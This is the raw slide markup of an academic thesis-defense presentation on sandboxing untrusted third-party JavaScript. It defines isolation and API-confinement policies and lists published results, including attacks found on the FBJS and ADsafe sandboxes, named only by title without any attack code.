            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FacebookFBJS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Adasfe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Caja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Note that these sandboxing mechanisms do not come with any formal documentation of their security goals and therefore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>We had to infer the policies from the respective implementations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thre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> next few slides I will define these policies and then define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sanboxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> problems for each of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the language-based sandboxing setup. The hosting page may have certain security objects such </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>as the cookie, the location object etc which it want to completely isolate from untrusted code. So untrusted code must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>acess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>whatsover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This is called the hosting page isolation policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Thus given a set of security-critical resources, the Sandboxing problem is to design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>asandboxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mechanism to ensure that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sanboxed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> code does not access any security critical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929A-3812-B543-9319-314D326FF5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cap="rnd">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:round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Ankur Taly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tx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Ankur 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fld id="{60403989-3EFF-4C4D-9A9D-F370A7D41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981200" y="49530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urier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0" y="6356350"/>
            <a:ext cx="2590800" cy="5016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Ankur Taly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590800" cy="5016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Ankur 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5016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590800" cy="5016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0403989-3EFF-4C4D-9A9D-F370A7D41F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network.com/ad1.js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hyperlink" Target="http://adnetwork.com/ad1.j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0866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4941" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ankur Taly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4235" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thesis Defense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059" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advisor: Prof. John C. Mitchell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fld id="{60403989-3EFF-4C4D-9A9D-F370A7D41F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1524000"/>
            <a:ext cx="7772400" cy="15240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Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400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356350"/>
            <a:ext cx="2590800" cy="5016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Ankur Taly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105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aptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="14478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256" y="15727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5252" y="3212068"/>
            <a:ext cx="14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Hosting page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Inter-Component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" name="Down Arrow 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4305299" y="2324101"/>
            <a:ext cx="304801" cy="160019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47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212" y="15240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7217569" y="4114800"/>
            <a:ext cx="1697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Third-party content servers</a:t>
            </a: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5410200" y="3505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Hosting page server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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4212431" y="1066800"/>
            <a:ext cx="3026569" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3514"/>
              <a:gd name="adj2" fmla="val 8614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Language-based sandboxing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3000" y="1709663"/>
            <a:ext cx="746412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682588" y="1709663"/>
            <a:ext cx="746412" cy="500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Bob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b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 rot="2700000">
            <a:off x="2754389" y="2245258"/>
            <a:ext cx="383703" cy="335166"/>
            <a:chOff x="2506640" y="2138879"/>
            <a:chExt cx="434794" cy="428923"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="62" name="Straight Arrow Connector 61"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="8100000" flipV="1">
              <a:off x="2511874" y="2162609"/>
              <a:ext cx="417922" cy="364897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1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2700000">
              <a:off x="2509575" y="2135944"/>
              <a:ext cx="428923" cy="434794"/>
              <a:chOff x="-1127214" y="-617790"/>
              <a:chExt cx="1296591" cy="102074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14640000">
                <a:off x="-977743" y="-550259"/>
                <a:ext cx="1020740" cy="88567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 flipV="1">
                <a:off x="-1127214" y="-230558"/>
                <a:ext cx="1296591" cy="183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9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1981200" y="1790955"/>
            <a:ext cx="625187" cy="342645"/>
            <a:chOff x="2209801" y="1675575"/>
            <a:chExt cx="625187" cy="342645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2212005" y="1773691"/>
              <a:ext cx="622982" cy="37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V="1">
              <a:off x="2209801" y="1904998"/>
              <a:ext cx="625187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1940000">
              <a:off x="2310906" y="1711061"/>
              <a:ext cx="399292" cy="269551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9900000" flipV="1">
              <a:off x="2354080" y="1675575"/>
              <a:ext cx="347863" cy="342645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Down Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4245333" y="1032722"/>
            <a:ext cx="367908" cy="18076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 rot="5400000">
            <a:off x="4225916" y="1177916"/>
            <a:ext cx="387368" cy="182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 rot="13099204">
            <a:off x="6432310" y="2339909"/>
            <a:ext cx="1040883" cy="3436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47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="18743590">
            <a:off x="1358770" y="2231748"/>
            <a:ext cx="413643" cy="335167"/>
            <a:chOff x="2526845" y="2107997"/>
            <a:chExt cx="440407" cy="428924"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Arrow Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="8100000" flipV="1">
              <a:off x="2526845" y="2200689"/>
              <a:ext cx="417923" cy="32255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1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="2700000">
              <a:off x="2540457" y="2110125"/>
              <a:ext cx="428924" cy="424667"/>
              <a:chOff x="-1127214" y="-708435"/>
              <a:chExt cx="1296591" cy="99696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556410" flipH="1" flipV="1">
                <a:off x="-941434" y="-213024"/>
                <a:ext cx="996966" cy="614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 flipV="1">
                <a:off x="-1127214" y="-230558"/>
                <a:ext cx="1296591" cy="183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ounded Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4953000"/>
            <a:ext cx="8382000" cy="1295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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: ensure that all sandboxed components: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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do not access any security-critical resources belonging to the hosting page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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do not write to any heap location that the other component reads from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87188" y="2649771"/>
            <a:ext cx="1889412" cy="626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Security-critical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resources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 rot="5400000">
            <a:off x="7035585" y="1298448"/>
            <a:ext cx="330633" cy="12953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pic>
        <p:nvPicPr>
          <p:cNvPr id="61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4478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5146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aptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="14478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Mediate Access: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0403989-3EFF-4C4D-9A9D-F370A7D41F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5493603"/>
            <a:ext cx="861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Motivated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object Capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Principle of least privilege  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/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6201" y="498526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Security Goal: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No direct access to security-critical resources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05256" y="15727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5256" y="2971800"/>
            <a:ext cx="2784373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Resources to protect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(entire DOM)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2468880"/>
            <a:ext cx="210113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API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1" y="1752600"/>
            <a:ext cx="2133600" cy="6858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Sandboxed code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(only access the API)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53580" y="2155448"/>
            <a:ext cx="316468" cy="1644371"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66052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5400000">
            <a:off x="7035582" y="1498818"/>
            <a:ext cx="330633" cy="12953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598569" y="2971800"/>
            <a:ext cx="1697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Third-party content server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Down Arrow 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4108173" y="1136373"/>
            <a:ext cx="394254" cy="2057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4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212" y="15240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410200" y="3505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Hosting page server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38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4478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ounded Rectangular Callout 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593431" y="990600"/>
            <a:ext cx="3026569" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -11906"/>
              <a:gd name="adj2" fmla="val 742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Statically analyze and rewrite third-party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5" grpId="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="3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aptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="17526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Mediate Access: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0403989-3EFF-4C4D-9A9D-F370A7D41F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5256" y="18775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5256" y="3276600"/>
            <a:ext cx="2784373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Resources to protect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(entire DOM)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2773680"/>
            <a:ext cx="210113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API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1" y="2057400"/>
            <a:ext cx="2133600" cy="6858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Sandboxed code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(only access the API)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163079" y="2029479"/>
            <a:ext cx="316470" cy="2025371"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6605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5400000">
            <a:off x="7035582" y="1727418"/>
            <a:ext cx="330633" cy="12953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674769" y="3352800"/>
            <a:ext cx="1697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Third-party</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Down Arrow 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4146273" y="1416328"/>
            <a:ext cx="394254" cy="19811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4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212" y="18288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410200" y="3810000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Hosting-page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38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7526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ounded Rectangular Callout 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="1143000"/>
            <a:ext cx="3026569" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -11906"/>
              <a:gd name="adj2" fmla="val 8720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Statically analyze and rewrite third-party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195042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25716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62400" y="195042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Inter-Component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6" name="Down Arrow 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4305299" y="2324101"/>
            <a:ext cx="304801" cy="160019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47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212" y="15240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7217569" y="4114800"/>
            <a:ext cx="1697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Third-party content servers</a:t>
            </a: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5410200" y="3505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Hosting page server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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4212431" y="1066800"/>
            <a:ext cx="3026569" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3514"/>
              <a:gd name="adj2" fmla="val 8614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Language-based sandboxing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1" name="Down Arrow 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4245333" y="1032722"/>
            <a:ext cx="367908" cy="18076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 rot="5400000">
            <a:off x="4225916" y="1177916"/>
            <a:ext cx="387368" cy="182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 rot="13099204">
            <a:off x="6432310" y="2339909"/>
            <a:ext cx="1040883" cy="3436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81000" y="4953000"/>
            <a:ext cx="8382000" cy="1295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200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: ensure that all sandboxed components: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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do not access any security-critical resources belonging to the hosting page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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do not write to any heap location that the other component reads from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Down Arrow 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7035585" y="1298448"/>
            <a:ext cx="330633" cy="12953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pic>
        <p:nvPicPr>
          <p:cNvPr id="61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4478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5146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aptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="13716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81456" y="14965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1456" y="2895600"/>
            <a:ext cx="2784373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Resources to protect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(entire DOM)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400" y="2392680"/>
            <a:ext cx="210113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API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5401" y="1676400"/>
            <a:ext cx="2133600" cy="6858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Sandboxed code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(only access the API)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Mediated Access: Problems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laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="14478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05256" y="15727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5256" y="2971800"/>
            <a:ext cx="2784373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Resources to protect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(entire DOM)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2468880"/>
            <a:ext cx="210113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API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1" y="1752600"/>
            <a:ext cx="2133600" cy="6858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Sandboxed code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(only access the API)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198" y="1295400"/>
            <a:ext cx="4800601" cy="1676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obtains access to ANY protected resource ONLY via the API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7200" y="3404576"/>
            <a:ext cx="4800600" cy="16246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API Confinement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: verify that sandboxed code cannot use the API to obtain direct access to a security-critical resource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66800"/>
            <a:ext cx="5480304" cy="205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27" b="1" dirty="0" smtClean="0"/>
              <a:t>Policies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t>Hosting Page Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t>Inter-Component Isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t>Mediated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962400"/>
            <a:ext cx="5334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02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Language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3027" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>standardized 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JavaScript</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3027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4904" lvl="0" indent="-283464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595" dirty="0" smtClean="0"/>
              <a:t>ECMA-262 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t> edition (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ES3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t>) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" i="1" dirty="0" smtClean="0"/>
              <a:t>Dec’99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" marR="0" lvl="0" indent="-283464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95" dirty="0" smtClean="0"/>
              <a:t>ECMA-262 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2595" dirty="0" smtClean="0"/>
              <a:t> edition (ES5) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" i="1" dirty="0" smtClean="0"/>
              <a:t>Dec’09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378" dirty="0" smtClean="0"/>
              <a:t>has a strict mode (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ES5-strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2378" dirty="0" smtClean="0"/>
              <a:t>)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7696" y="3964698"/>
            <a:ext cx="4419600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Techniques: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Language Semantics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Inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Runtime Monitoring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Static Analysis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Object Capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="l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599"/>
            <a:ext cx="5257800" cy="24384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066800"/>
            <a:ext cx="485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Setup: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60403989-3EFF-4C4D-9A9D-F370A7D41FF0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107531" y="3673475"/>
            <a:ext cx="53657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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5715000" y="5867400"/>
            <a:ext cx="762000" cy="369332"/>
            <a:chOff x="5410200" y="5955268"/>
            <a:chExt cx="762000" cy="3693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410200" y="6170612"/>
              <a:ext cx="152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2008</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/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5715000" y="4659868"/>
            <a:ext cx="762000" cy="369332"/>
            <a:chOff x="5410200" y="4800600"/>
            <a:chExt cx="762000" cy="36933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410200" y="5029200"/>
              <a:ext cx="152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486400" y="4800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2009</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/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5715794" y="3440668"/>
            <a:ext cx="761206" cy="369332"/>
            <a:chOff x="5410994" y="2819400"/>
            <a:chExt cx="761206" cy="36933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410994" y="3048000"/>
              <a:ext cx="152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486400" y="2819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2010</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0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5715794" y="2133600"/>
            <a:ext cx="761206" cy="369332"/>
            <a:chOff x="5410994" y="1676400"/>
            <a:chExt cx="761206" cy="36933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10994" y="1940143"/>
              <a:ext cx="152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864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2011</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0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76994" y="4599432"/>
            <a:ext cx="5255418" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59198"/>
              <a:gd name="adj2" fmla="val -159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Language-Based Isolation of Untrusted JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[CSF’09]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76994" y="2667000"/>
            <a:ext cx="5256212" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59402"/>
              <a:gd name="adj2" fmla="val -1393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 Capabilities and Isolation of Untrusted Web Applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Oakland’10]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="19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76200" y="5679488"/>
            <a:ext cx="5256212" cy="492712"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59765"/>
              <a:gd name="adj2" fmla="val -120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 Operational Semantics for JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[APLAS’08]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="19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6400800" y="3048000"/>
            <a:ext cx="2667000" cy="725541"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72179"/>
              <a:gd name="adj2" fmla="val -120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Inter-component attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the FBJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandbox  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6" name="Rounded Rectangular Callout 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="4191000"/>
            <a:ext cx="2743200" cy="705760"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71119"/>
              <a:gd name="adj2" fmla="val -149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Hosting page attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FBJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>09 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandbox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2" name="Rounded Rectangular Callout 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3874532"/>
            <a:ext cx="5256212" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59968"/>
              <a:gd name="adj2" fmla="val -120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Isolating JavaScript with Filtering Rewriting and Wrapping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[ESORICS’09]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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76200" y="1504040"/>
            <a:ext cx="5256212" cy="705760"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59455"/>
              <a:gd name="adj2" fmla="val -120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Automated Analysis of Security-Critical JavaScript APIs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[Oakland’11]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  Automated Tool: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ENCAP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5" name="Rounded Rectangular Callout 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1676400"/>
            <a:ext cx="2667000" cy="998892"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71951"/>
              <a:gd name="adj2" fmla="val -113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Confinement attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on the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FBJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM APIs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6400800" y="5093732"/>
            <a:ext cx="2667000" cy="989012"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72526"/>
              <a:gd name="adj2" fmla="val -149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Hosting page attack on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the FBJS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and ADSafe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sandboxes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1093113"/>
